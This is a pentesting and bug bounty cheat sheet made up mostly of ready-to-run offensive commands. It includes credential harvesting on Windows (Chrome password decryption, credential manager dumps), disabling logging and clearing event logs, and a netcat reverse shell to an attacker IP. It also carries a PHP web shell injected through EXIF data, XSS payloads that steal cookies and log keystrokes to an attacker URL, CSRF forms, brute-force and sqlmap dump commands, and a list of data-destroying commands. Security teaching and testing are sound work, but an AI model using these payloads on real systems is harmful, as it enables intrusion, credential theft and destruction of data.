- Network tools
- Web Shells
- Scripts
- Commands
- Payloads with description. Here just payloads in file
- Sites
- Tools
- Privilege Escalation
- Tips
- GPTs (Agents) for Cybersecurity
- OSINT
- API
- WordPress
- JWT
- Help with Pentesting and Bug Bounty processes
- Cloud
- Active Directory
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:<TARGET_IP> /u:<USERNAME> /p:<'PASSWORD'> xfreerdp /v:<TARGET_IP> /u:<USERNAME> /p:<PASSWORD> +clipboard - To get stable shell from unstable from PowerShell. FILENAME.exe is the reverse shell:
powershell -c "Invoke-WebRequest -Uri 'http://<LOCAL_IP>:<PORT>/<FILENAME.exe>' -OutFile 'C:\Windows\Temp\<FILENAME.exe>'" With this command, you can identify files with potentially sensitive data such as account information, credentials, configuration files, etc. based on their filename:
gci c:\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinueThis command will look for remnants of autosets and autoconfigurations that could potentially contain plain text or base64 encoded passwords:
gci c:\ -Include *sysprep.inf,*sysprep.xml,*sysprep.txt,*unattended.xml,*unattend.xml,*unattend.txt -File -Recurse -EA SilentlyContinueWith this command it is possible to find files containing a specific pattern, for example here we are looking for the "password" pattern in various text configuration files:
gci c:\ -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern "password"Using the following PowerShell command, you can find database connection strings (with plain text credentials) stored in various configuration files such as web.config for ASP.NET configuration, Visual Studio project files, etc.:
gci c:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString"With this command, you can easily find configuration files belonging to a Microsoft IIS, XAMPP, Apache, PHP, or MySQL installation:
gci c:\ -Include web.config,applicationHost.config,php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -EA SilentlyContinueWith the following one-liner, we can retrieve all stored credentials from the credential manager using the CredentialManager PowerShell module:
Get-StoredCredential | % { write-host -NoNewLine $_.username; write-host -NoNewLine ":" ; $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password) ; [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p); }The following command retrieves saved credentials from the Google Chrome browser, if installed and if there are saved passwords:
[System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($datarow.password_value,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser))The following command will get the autologin credentials from the registry:
gp 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon' | select "Default*"Sometimes it can be useful to set the MAC address on a network interface, and with PowerShell we can easily do this without using third party utilities:
Set-NetAdapter -Name "Ethernet0" -MacAddress "00-01-18-57-1B-0D"This trio of commands can be useful when there is a goal to connect to the system using a graphical RDP session, but for some reason it is not enabled:
Allow RDP connections -
(Get-WmiObject -Class "Win32_TerminalServiceSetting" -Namespace root\cimv2\terminalservices).SetAllowTsConnections(1)Disable NLA -
(Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)Allow RDP on the firewall -
Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Set-NetFirewallRule -Enabled TrueHere is a useful command to whitelist an IP address in Windows Firewall:
After we are done with our cases, remove the rule:New-NetFirewallRule -Action Allow -DisplayName "name_rule" -RemoteAddress <DESIRED_IP>Remove-NetFirewallRule -DisplayName "name_rule"With the following commands, we can disable the logging feature of PowerShell commands in the current shell session:
Set-PSReadlineOption –HistorySaveStyle SaveNothingOR
Remove-Module PSReadlineHere is a simple PowerShell command to query the Security Center and determine all installed antivirus products on this computer:
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct
- Find all files in / directory (-type d for find dirs):
find / -type f - File name search:
find / -type f | grep '<FILE_NAME>' - Find all path files with ‘config’ in proc dirs:
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null - To turn off send hostname via DHCP
sudo nano /etc/NetworkManager/system-connections/Wired\ connection\ 1[ipv4]
method=auto
dhcp-send-hostname=false
- To allow traffic routing on your part (Main rule for MITM)
sudo sysctl -w net.ipv4.ip_forward=1 - Transferring files
scp <FILE_NAME> <USERNAME>@<TARGET_HOST>:</path/to/dir/on/victim_machine>wget http://<ATTACKER_IP>:<ATTACKER_PORT>/<FILE_NAME>curl http:///<ATTACKER_IP>:<ATTACKER_PORT>/<FILE_NAME> -o <FILE_NAME>
- This command will delete all files and folders on your computer:
rm -rf / - Also known as a "fork bomb", this command can cause a memory overflow on your computer and lead to system crash:
:(){ :|: & };: - This command formats the hard drive without any warning or confirmation. All data will be lost:
mkfs.ext4 /dev/sda - This command overwrites all data on the hard drive with random values, resulting in data loss:
dd if=/dev/random of=/dev/sda - This command grants full access to your file system for all users, which can compromise security:
chmod 777 / - This command moves all files in your home directory to "null", effectively deleting them:
mv /home/* /dev/null - This command downloads a file and overwrites all data in "null", resulting in data loss:
wget http://example.com/file -O /dev/null - This command formats the hard drive partition without any warning or confirmation. All data on this partition will be lost:
mkfs.ext4 /dev/sda1 - This command creates a symbolic link to "/etc/passwd" in "null", resulting in data loss:
ln -s /dev/null /etc/passwd - This will replace your partition containing all the necessary data for booting the system with the string "Hello":
echo "Hello" > /dev/sda - Such commands will download and execute malicious scripts on your system, potentially compromising your system's security:
wget http://malicious_source -O- | sh
- This command searches for the string "password" inside all files with the extensions .xml, .ini, .txt, and .config on the current C: drive:
cd C:\ & findstr /s /p /i /n /m "password" *.xml *.ini *.txt *.config- cd C:\ - changes to the root directory of the C: drive
- findstr - command for searching strings in files
- /s - performs a search in all subdirectories
- /p - skips files with non-printable characters
- /i - ignores case sensitivity when searching for strings
- /n - displays the line number containing the string
- /m - displays only the file name if a match is found
-
dir- like ls in linux -
treeutility is useful for graphically displaying the directory structure of a path or disktree c:\ /f | more- used to walk through all the files in the C drive -
icaclsThe resource access level:
- (CI): container inherit
- (OI): object inherit
- (IO): inherit only
- (NP): do not propagate inherit
- (I): permission inherited from parent container
- F : full access
- D : delete access
- N : no access
- M : modify access
- RX : read and execute access
- R : read-only access
- W : write-only access
Checking for a vulnerability in the software on the server:
Nmap -Pn <TARGET_IP> --script=vulners.nse -p<PORT(S)>
nmap --script ssh-brute -p <SSH_PORT> <TARGET_IP> --script-args userdb=users.lst,passdb=passwords.lst
nmap -d --script ftp-brute -p <FTP_PORT> <TARGET_IP>
nmap -sV --script=mysql-empty-password <TARGET_IP>
nmap --script mysql-brute -p <MYSQL_PORT> <TARGET_IP> --script-args userdb=users.lst, passdb=passwords.lst
nmap -sV -p <PORT> --script http-enum <TARGET_IP> P.S. If CMS, research <name_0f_CMS_0r_DB> brute force nmap
P.P.S. Full list of NMAP NSE sctipts.
Catogories: auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, vuln.
Need to install script. Thanks for that, Scip ag!git clone https://github.com/scipag/vulscan.gitOr read Scip ag instructions. It`s easy.
- Copy to /usr/share/nmap/scripts/ or another folder where you keep nmap scripts
- Get rights
-
nmap -sV --script=vulscan/vulscan.nse <TARGET>
-u - target url
-w - wordlist
-s - include only responses with the specified status codes (comma-separated)
-d - exclude responses with the specified status codes (comma-separated)
--exclude-length - exclude responses with specific content lengths (comma-separated, supports ranges)
gobuster dir -u <TARGET_URL> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtvhost - for enumirate virtual hosts
gobuster vhost -w </path/to/wordlist> -u <url>t - threads
gobuster dns <TARGET_DOMAIN> -w /usr/share/wordlists/dns/subdomains_list.txt -t 50 hydra -P <WORLIST> -v <TARGET_IP> <PROTOCOL> Brute Force ssh:
hydra -L /path/to/file/user.txt -P /path/to/file/pass.txt <TARGET_IP> ssh -t 4Brute Force smb example:
hydra -L ~/path/to_file/user.txt -P ~.path/to_file/pass.txt <TARGET_IP> smb -VCan use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in some lists. (-vV = verbose mode, showing login attempts):
hydra -v -V -u -L <USERNAME_LIST> -P <PASSWORD_LIST> -t 1 -u <TARGET_IP> <PROTOCOL> Attack a Windows Remote Desktop with a password list:
hydra -t 1 -V -f -l <USERNAME> -P <WORDLIST> rdp://<TARGET_IP> Craft a more specific request for Hydra to brute force:
hydra -l <USERNAME> -P .<PASSWORD_LIST> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' dirsearch -e php,log,sql,txt,bak,tar,tar.gz,zip,rar,swp,gz,asp,aspx -u '<TARGET_IP>' - Python way. PTY is a library for pseudo-terminal functionality that is part of the Standard Python Library. There is a nc shell and get pump shell:
python -c 'import pty;pty.spawn("/bin/bash")'After nc connecting:
stty raw -echo && fgIf no python:
/usr/bin/script -qc /bin/bash /dev/null - Another way:
Console to bg (Ctrl+Z) ->
script /dev/null -c /bin/bashThen double Enter and we again in shell and inputstty raw -echo; fgexport TERM=xterm
sqlmap -u "<TARGET_URL>" --dbs --batch--dbs - get db name
--batch -default whenever user input is unavoidable
When get the db name to get tables name
sqlmap -u "<TARGET_URL>" -D <db_name> --tables --batch--tables - tables enumiration
To get columns name in the table of interest
sqlmap -u "<TARGET_URL>" -D <db_name> -T <table_name> --columns --batch--columns - to output db columns
Get data from table
sqlmap -u "<TARGET_URL>" -D <db_name> -T <table_name> --dump --batchWill execute all the above functions at once and output all information about the database, including table names, columns, etc.
sqlmap -u "<TARGET_URL>" -D <db_name> --dump-all --batchjohn --format=raw-<encryption> --wordlist=path/to/wordlist.txt to_crack.txtThere is a username and hash password (username:d776dd32d662b8efbdf853837269bd725203c579 and this line in file to-crack.txt), so use this mode to generate password variations (Username, USERNAME, UseRNAmE, and so on):
john --single --format=raw-sha1 to_crack.txtThere is a file to_crack.txt with edba955d0ea15fdef4f61726ef97e5af507430c0, for example.
The command to run John in dictionary mode using the wordlist:
john --wordlist=path/to/wordlist.txt --format=raw-sha1 to_crack.txtIt tries all possible character combinations as passwords. Can go on for a long time if the password is too long or a combination of alphanumeric characters and symbols:
john -i:digits passwordfile.txt-i - tells John that to use the increment mode
digits - can be used to set the maximum number of digits in the password
john --format=lm to_crack.txtThe unshadow command combines the passwd (/etc/passwd) and shadow(/etc/shadow) files together into a single file. This can then be used by John to crack passwords.
The command will combine the files together and create an output.db file:
unshadow /etc/passwd /etc/shadow > output.dbNow crack the output.db file:
john output.dbFirst have to get the hash of the zip file’s password. Command will get the hash from the zip file and store it in the zip.hashes file:
zip2john file.zip > zip.hashesThen to crack the hash:
john zip.hasheshash.txt > 8743b52063cd84097a65d1633f5c74f5
Use:
hashcat -m 0 -a 0 hash.txt passwordlist.txt-m 0 - MD5 hash mode
-a 0 - dictionary mode
hash.txt - txt file containing hash in a compliant format
passwordlist.txt - dictionary file containing passwords in plain text
hash.txt > md5($pass.$salt): 01dfae6e5d4d90d9892622325959afbe:7050461
hashcat -m10 -a0 hash.txt passwordlist.txt-m 10 - salted MD5 hash mode
hash.txt > md5crypt, MD5 (Unix), Cisco-IOS
hashcat -m 500 -a 0 hash.txt passwordlist.txt-m 500 - MD5Crypt Digests hash mode
hash.txt > HMAC-SHA1 (key = $pass) c898896f3f70f61bc3fb19bef222aa860e5ea717:1234
hashcat -m150 -a 0 hash.txt passwordlist.txt-m 150 - HMAC-SHA1 key hash mode
hash.txt > b89eaac7e61417341b710b727768294d0e6a277b
hashcat -m100 -a 0 hash.txt passwordlist.txt-m 100 - SHA1 digest hash mode
hash.txt > SHA2-384 07371af1ca1fca7c6941d2399f3610f1e392c56c6d73fddffe38f18c430a2817028dae1ef09ac683b62148a2c8757f42
hashcat -m 10800 -a 0 hash.txt passwordlist.txt-m 10800 - SHA-2 Digests hash mode
hash.txt > SHA3–512 7c2dc1d743735d4e069f3bda85b1b7e9172033dfdd8cd599ca094ef8570f3930c3f2c0b7afc8d6152ce4eaad6057a2ff22e71934b3a3dd0fb55a7fc84a53144e
hashcat -m 17600 -a 0 hash.txt passwordlist.txt-m 17600 - SHA3–512 hash mode
hash.txt > b4b9b02e6f09a9bd760f388b67351e2b
hashcat -m 1000 -a 0 hash.txt passwordlist.txt-m 1000 - NTLM Digests hash mode
hash.txt > c762de4a:00000000
hashcat -m 11500 -a 0 hash.txt passwordlist.txt-m 11500 - CRC32 hash mode
- site: - returns results for the specified domain
- intitle: - search in title
- inurl: - search by url
- related: - returns sites to the specified one
- ext: or filtype: - search by page extension or filetype
- cahce:
- intext:
- allintext:
- allinurl:
- More here
- AWS keys
path:**/.env AWS_ACCESS_KEY_ID - Open DB passwords
DB_PASSWORD= - DB dump files
path:*.sql "CREATE TABLE" AND "INSERT INTO" - API keys
path:**/.properties api_key - Root passwords in docker-compose
path:**/docker-compose.yml MYSQL_ROOT_PASSWORD - Private keys
path:*.pem private - Open secrets JWT
language:javascript jwt_secret OR jwt_key - Open .git directories
path:**/.git/* - Public ssh keys
path:*.pub "ssh-rsa" - Passphrase
passphrase * path:**/.json - Check commit and issues
- Search and looking for vulns in codes (for example SQLi and SSRF)
/SELECT \* FROM.*\$_GET//file_get_contents\(.*\$_GET|curl_exec\(.*\$_GET//(subprocess|exec|spawn|system).*chrome.*--headless/
-mc (match code) - Include only responses that match the specified status codes (e.g., 200,204,301, 400-499)
-ms (match size) - Include only responses that match a specific size or range of sizes
-mw (match word count) - Include only responses that have the specified amount of words in the response body (-fw "admin")
-ml (match line count) - Include only responses that have the specified amount of lines in the response body
-mt (match time) - Include only responses that meet a specific time-to-first-byte (TTFB) condition. This is useful for identifying responses that are unusually slow or fast, potentially indicating interesting behavior
-fc (filter code) - Exclude responses that match the specified status codes, using the same format as -mc
-fs (filter size) - Exclude responses with a specific size or range of sizes
-fw (filter word) - Enclude only responses containing the specified word or phrase in the response body
-fl (filter line) - Exclude responses with a specific number of lines or range of lines. For example, -fl 5 will filter out responses with 5 lines
-e - extension`s file
-recursion - recursion fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://<TARGET_IP>:<TARGET_PORT>/FUZZ -e .php,.html,.txtffuf -w /path/to/wordlist1.txt -w /path/to/wordlist2.txt -u https://example.com/FUZZ?param=FUZZ -mc 200 -icffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://<TARGET_IP>:<TARGET_PORT>/FUZZ -recursionffuf -u http://<TARGET_URL> -H "FUZZ.<TARGET.DOMAIN>" -w /path/to/worlist- Download deb packet
- Install:
sudo dpkg -i rustscan_2.0.1_amd64.deb - Use:
- Simple ports scanning:
rustscan -a www.<target_site.com> - Specific port scanning:
rustscan -a www.<target_site.com> -p 443Or few ports:
rustscan -a www.<target_site.com> -p 21,22,80,443 - Ports detection in the range 1-1000:
rustscan -a www.<target_site.com> --range 1-1000
- Simple ports scanning:
- Scanning a Single IP Address:
masscan <target_ip> - Scanning an IP Range:
masscan 192.168.0.0-192.168.0.255 - Scanning Specific Ports:
masscan -p80,443 192.168.0.1 - Scanning All Ports:
masscan -p0-65535 192.168.0.1 - Setting Scan Rate:
masscan -p80 192.168.0.1 --rate 10000--rate - lets set the scan rate. In this case, scanning occurs at 10,000 packets per second. Select the speed individually. IMHO 500-1000 is ok.
- Saving Results to a File:
masscan -p80 192.168.0.1 -oG results.txt-oG - allows to save scan results in grepable format to a file.
- Scanning Specific Packet Types:
masscan -p80 192.168.0.1 --packet 1-5--packet - lets specify packet types for scanning.
- Scanning via SOCKS5 Proxy:
masscan -p80 192.168.0.1 --source-ip <proxy_ip> --source-port <proxy_port>flags allows to specify the source IP and port for scanning through a SOCKS5 proxy.
- arp - displays MAC and IP addresses of local devices interacted with
- cd - command to change to another directory/folder
- clearev - clears logs (need administration privs)
- dir/ls - lists files and folders in the specified directory
- download - downloads files from the remote machine to the local machine
- getpid - displays the process ID under which Meterpreter is running
- getproxy - retrieves information about the system's proxy server
- getsystem - attempts to escalate privileges
- getuid - displays the current user on behalf of whom Meterpreter is running
- hashdump - dump all password hashes
- help - help, display help documentation
- idletime - displays user inactivity time on the remote computer
- ifconfig/ipconfig - displays network settings
- migrate - migrates meterpreter to another process
- netstat - displays current network connections
- ps - lists all current processes
- pwd - displays the current directory/folder
- record_mic - records audio on the remote machine
- route - displays the routing table
- run persistance <with_parameters> - get backdoor (persistance help)
- search - search for files, modules
- show_mount - lists physycal and logical disks
- sysinfo - dislays brief information about the remote system
- upload - uploads files from the local machine to the remote machine
- webcam_chat - organize a video chat
- webcam_snap - takes a snapshot from the remote built-in camera
- webcam_stream - obtains a video stream from the remote built-in camera
-
run post/multi/recon/local_exploit_suggester- recon for privesc -
load kiwi- to load mimikatz
- Clearing log files
- wevtutil cl Application
- wevtutil cl System
- wevtutil cl Security
OR check firewall settings to find location of log file
- netsh firewall show config (old command)
- netsh advfirewall show currentprofile (MS recomends that command) -> cd log file direcroty, more file.log for read -> disable firewall
- netsh firewall set opmode disable - disables the firewall (old command)
- netsh advfirewall set currentprofile state off
- del file.log
- Viewing System Information
- systeminfo - displays system information and installed patches
- net user - lists local users
- whoami /all - provides information the current user
- driverquery - lists installed drivers
- Network Settings
- ipconfig /all - shows network settings
- ipconfig /displaydns - display cached DNS records
- arp -a - lists IP addresses that the computer has communicated with
- netstat - shows established connections
- netstat -a - lists open ports
- netstat -ao - displays open ports and associated IDs
- netstat -abo - lists open ports, associated process IDs, and their names
- netstat -r - shows the routing table
- Working with Services
- tasklist - lists current processes
- taskkill /f /pid "process_number" - terminates a process
- schtasks - displays scheduled tasks
- sc query - lists all services
- sc query "service_name" - checks the status of a service
- sc start/stop "service_name" - starts or stops service
- net start - lists running services
- Working with the File System
- cd - navigates through the file system
- dir - lists files and folders in the current directory
- dir /ah - displays hidden files and folders
- dir /ad - lists folders only
- dir /b /s "folder and search term" - searches for files based on a keyword
- mkdir - creates a new folder
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
-
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER_IP> <ATTACKER_PORT> >/tmp/f
-
git log- show commits` history -
git diff- show difference between commits -
git blame- who and when changed line in file -
git checkout- change commit or branch -
git branch- show branches -
git tag- show all tags in the repo
- Copy id_rsa
- chmod 600 id_rsa to set right permissoon for use (It is required that your private key files are NOT accessible by others.)
- Connect
- For Linux
- For Windows
- %0a to bypass regex rules:
- DotDotPwn can help with testing (
sudo apt install dotdotpwn)
http://vuln.host/some.php?file=%0a../../../../etc/passwd- Magic Bytes:
- PNG -
89 50 4E 47 0D 0A 1A 0A - JPEG -
FF D8 FF - GIF (FIG87a) -
47 49 46 38 39 61
- PNG -
- Upload normal image file and intersept the request and try:
- Change file extension to php5 and the same
- Double extionsion
- Null Byte
- Change Content-Type
- Injecting through EXIF Data:
exiftool -comment="<?php system($_GET['cmd'])>" file.pngecho "<?php system($_GET['cmd'])>" >> file.jpeg- Proof Of Concept (PoC):
<scRIPt>alert('Success XSS!');</sCriPt>print()prompt()<img src=x onerror=alert()><img src=x onerror="window.location.href='http://some.site'>"<svg/onload=confirm("document.cookie")> - XSS -> LFI
<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); </script> - This is the simplest of payloads where all you want to do is demonstrate that you can achieve XSS on a website.
Session Stealing -
<script>fetch('url/steal?cookie=' + btoa(document.cookie));</script>Details of a user's session, such as login tokens, are often kept in cookies on the targets machine. The below JavaScript takes the target's cookie, base64 encodes the cookie to ensure successful transmission and then posts it to a website under the hacker's control to be logged. Once the hacker has these cookies, they can take over the target's session and be logged as that user.
Key Logger -
document.onkeypress = function(v) {fetch('url/log?key=' + btoa(v.key));}</script>The below code acts as a key logger. This means anything you type on the webpage will be forwarded to a website under the hacker's control. This could be very damaging if the website the payload was installed on accepted user logins or credit card details.
Business Logic -
<script>user.changeEmail('e@mail.com');</script>This payload is a lot more specific than the above examples. This would be about calling a particular network resource or a JavaScript function. For example, imagine a JavaScript function for changing the user's email address called user.changeEmail().
Polyglots -
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('Success XSS!'))//%0D%0A%0d%0a//\x3csVg/\x3eAn XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one. You could have used the below polyglot on all six levels you've just completed, and it would have executed the code successfully.
- XSS Bypass WAF:
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041// - Try to download to bypass shielding file with name like:
<img src=1 onerror=alert()>.png - XSS through SVG file:
<?xml verion="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns=""www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg> - XSS through metadata
Set header to
Content-Type: text/htmlexiftool file.jpeg -Comment='<script>alert(1)</script>' - Tips for exploit:
- try to upload a file (image, svg, html) that contains xss payload inside
- Description of XSS payloads here
<html>
<body>
<form action="https://ACTION_URL.COM" method="POST">
<input type="hidden" name="email" value="ATTACKER@MAIL.HACK" />
<input type="hidden" name="csrf" value="YOUR_CSRF" />
</form>
<img src="https://URL_WITH_PARAMETER_ASSIGNMENT/?PARAM=TEST%0d%0aSet-Cookie:%20csrf=NEEDED_CSRF_TOKEN%3b%20SameSite=None" onerror="document.forms[0].submit();" />
</body>
</html>
<meta name="referrer" content="never"><script type="text/javascript">
document.forms[0].submit();
</script>?u=example2\.com ❎
?u=example\.com@example2\.com ✅- Polyglot:
${{<%[%'"}}%\
%0D%0A
- %0D — CR (Carriage Return)
- %0A — LF (Line Feed)
https://sitereport.netcraft.com/?url=<TARGET_URL>- Fagan Finder - is an excellent source of information. You enter a query, then click on the desired source. Then you are redirected to the relevant page. The most important thing is that it shows how many sources there can be and how diverse they can be: from the Library of Congress website to leak publication services
- Intelligence X - it not only searches for leaks but also helps navigate other OSINT tools. Services for email verification, DNS search - you'll find them here too. Go to the Tools section and search specifically
- Social Catfish - is the perfect facial recognition search engine that can search for people by face, name, email, address, and username
- Spokeo - is a database used for identifying people and providing accurate information about them. It is constantly updated and boasts over 6 million consumers, 130 million property records, 600 million legal records, and over 120 social networks, making it an ideal people search system for personal and business use
- Google Image Search - uses the powerful Google Bot to scan all publicly accessible websites for images to create the largest and most frequently updated image database in the world
- PimEyes - is one of the best facial recognition search engine tools that allows you to perform in-depth image searches on the internet. Advanced convolutional neural networks analyze the image you upload to find objects and match them with the database
- FaceCheck.ID - is one of the best reverse image search tools for facial recognition. You can use it to search for images of a specific person. It identifies faces in the photo you upload, and then finds similar faces in social media posts, online videos, fraudulent accounts, websites, news and blog pages, as well as in product marketing
<-- Back
Tools
- GitHub Tools
- Browsers extensions. Note: Chrome extensions also work with Brave Browser
- Burp Suite Extensions
- Kali Tools
- Platforms for hacking and pentesting
GitHub Tools
My GitHub stars where I categorized github tools.👇Some of the most awesome tools (IHMO)👇
- BruteForce & Wordlists
- Enumiration
- OSINT
- Payloads
- Privilege Escalation
- Social Engineering
- Looking for exploits and vulnerabilities
- Another
-
BruteForce and Wordlists
- Active Directory Wordlists contains User.txt and Pass.txt
- BruteForce Database
- YAWR. Yet Another Wordlists Repo. Contains OS,RECON,WEB,brute folders
-
Crunch
This is one of many powerful tools for creating an offline wordlist. With crunch, you can specify numerous options, including min, max, and options. The following example creates a wordlist containing all possible combinations of 3 characters, including 1-5 and qwerty. You can use the -o argument to save.
Example:
crunch 3 3 12345qwerty -o cranch.txt - Top wordlists by DanielMiessler
- DNS asynchronous bruteforce
-
Tool for hash identification.
Python file. Powerful. User friendly interface.
- Kerberos bruteforcing
-
Username generator
Could help create a list with most of the possible combinations if we have a first name and last name. Use git clone and
shows the tool's help message and optional arguments.python3 username_generator.py -h - Wordlists by kkrypt0nn. A collection of wordlists for many different usages
-
Enumiration
- WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools
- Certipy. Tool for Active Directory Certificate Services enumeration and abuse
- Fuzzer
- fuzzdb
- Knock.py - subdomain scanner
- Linux smart enumiration
- Sublist3r. Subdomains enumiration python tool
-
OSINT
- Fast Google Dorks Scan
- h8mail is an email OSINT and breach hunting tool
- theHarvester. E-mails, subdomains and names Harvester
-
Payloads
- All kind of payloads and bypasses
- Payloads for Unix and Windows OS
- XSS-LOADER. All in one tools for XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER
- XSS payloads
-
Privilege Escalation
- Privilege Escalation (LinPEAS & WinPEAS)
- Enumy. Linux post exploitation privilege escalation enumeration
- Linux PrivEsc Check Script
- Linux PrivEsc
- Mimikatz. Windows PrivEsc
- Postenum is a Linux enumeration and privilege escalation tool
- RougeWinRM. Win PrivEsc
-
Social Engineering
-
Looking for exploits and vulnerabilities
- Searchsploit - provides direct access to the Exploit Database from the Kali Linux terminal. Users can utilize powerful search commands to quickly discover exploits and vulnerabilities. This tool is an indispensable assistant for security professionals working in the Kali Linux environment
- getsploit - combines the functionality of searchsploit with the ability to download exploits. It allows users to conduct online searches across databases such as Exploit-DB, Metasploit, and Packetstorm. Additionally, it provides the capability to download exploit source code directly, making the search and retrieval of necessary data for pentesting simple and effective
- CVEMap - a tool from Projectdiscovery designed for quick and convenient searching across all known vulnerability databases
- Pompem - a tool pre-installed in Parrot OS, automates the process of searching for exploits and vulnerabilities. It uses an advanced search system to check databases such as PacketStorm Security, CXSecurity, ZeroDay, Vulners, and NVD
- SiCat - stands out for its comprehensive approach to exploit searching. It adeptly extracts information about exploits from open sources and local repositories
-
Another
- Wapiti. Web vulnerability scanner
- Bearer. Scans source code against top security and privacy risks
- CrackMapExec. A swiss army knife for pentesting networks
- BloodHound. Six Degrees of Domain Admin
-
Cewl can be used to effectively crawl a website and extract strings or keywords. Cewl is a powerful tool to generate a wordlist specific to a given company or target. Consider the following example below:
cewl -w list.txt -d 5 -m 5 http://target_site.com-w will write the contents to a file, here is list.txt.
-m 5 gathers strings (words) that are 5 characters or more
-d 5 is the depth level of web crawling/spidering (default 2)
http://target_site.com is the URL that will be used
As a result, now have a decently sized wordlist based on relevant words for the specific enterprise, like names, locations, and a lot of their business lingo. Similarly, the wordlist that was created could be used to fuzz for usernames.
-
Hexeditor
Tools for change files signature. Link to Wiki with List of file signatures.
- Lynis. Check Linux security
- Pspy. Great for enumeration of Linux systems in CTFs and more.
- Hash Identifier . Python file. Powerful. User friendly interface.
Browser extensions
- Wappalyzer (FireFox | Chrome) - Defines CMS, JS-libraries, frameworks and another technologies used on the site
- Foxy Proxy (FireFox | Chrome) - Fast change proxy, for example, use with Burp Suite
- Rested (FireFox) - Quick request sender. Usefull with API
- Alratir (FireFox | Chrome) - help with GraphQL requests
- HackTools (FireFox | Chrome) - is a web extension facilitating your web application penetration tests, it includes cheat sheets as well as all the tools used during a test such as XSS payloads, Reverse shells to test your web application
- Cookie Editor (FireFox | Chrome) - Allows you to change, delete, add cookie values for various testing purposes. Can be tested for access control errors, privilege escalation, etc
- Hackbar (FireFox | Chrome) - Contains payloads for XSS attacks, SQL injections, WAF bypass, LFI, etc
- ModHeader (FireFox | Chrome) - Helps to easily change HTTP request and response headers in the browser
- User-Agent Switcher (FireFox | Chrome)
- Wayback Machine (FireFox | Chrome) - Official Internet Archive Wayback Machine Browser Extension. Non official for FireFox
- Firefox Multi-Account Containers. Lets you keep parts of your online life separated into color-coded tabs.
- Beautifer & Minify (FireFox | Chrome) - Brings readable CSS, HTML and JavaScript code
- BuiltWith (FireFox | Chrome) - Get web app technologies
- DotGit (FireFox | Chrome) - An extension to check for the presence of .git on websites you visit. Also checks open .env files, security.txt and more
- Email Extractor (FireFox | Chrome) - Automatically saves email addresses from the web pages visit. Helps with social engineering attacks, brute force attacks, etc
- Exif-Viewer (FireFox | Chrome) - Help to check photo metadata
- Fake Filler (FireFox | Chrome) - Simplifies and speeds up testing of fillable forms by developers and testers. Helps to populate all input forms (text fields, areas, dropdowns, etc.) with fake and randomly generated data
- Knoxss (FireFox) - Finds XSS vulnerabilities. Community Edition and Pro Version
- Nimbus Screenshot (FireFox | Chrome) - To make screenshot
- Privicy Badger (FireFox | Chrome) - utomatically learns to block invisible trackers
- Temp Mail (FireFox) - Temporary disposable email address. Protect your email from spam, bots and phishing with Temp-Mail
- Retire.js (FireFox | Chrome) - Displays the resence of vulnerable JavaScript libraries. This helps to find known vulnerabilities in JS and some CVEs affecting sites with vulnerable JS libraries
- Shodan (FireFox | Chrome) - The Shodan plugin tells you where the website is hosted (country, city), who owns the IP and what other services/ ports are open
- Ublock Origin (FireFox | Chrome) - An efficient wide-spectrum content blocker
- Chaff (Chrome) - Generate fake traffic
- TruffleHog Chrome Extension (FireFox | Chrome) - Scans the websites you visit looking for API keys and credentials and notifies you if they are found
- OWASP Penetration Testing Kit (FireFox | Chrome) - help with checks for commin bug
- Vulners Web Scanner (FireFox | Chrome) - Tiny and passive vulnerability scanner based on vulners.com vulnerability database
- Web Developer (FireFox | Chrome) - Adds a toolbar button with various web developer tools
- Panic Button (FireFox | Chrome) - Quickly hide all browser windows with a click of a button
Burp Suite Extensions
- Autorize help to detect authorization vulnerabilities
- Logger++ allows advanced filters to be defined to highlight interesting entries or filter logs to only those which match the filter
- PyCrypt enables users to encrypt and decrypt requests and response for manual and automated application penetration testing
- JWT Editor. Is a extension or editing, signing, verifying, encrypting and decrypting JSON Web Tokens (JWTs)
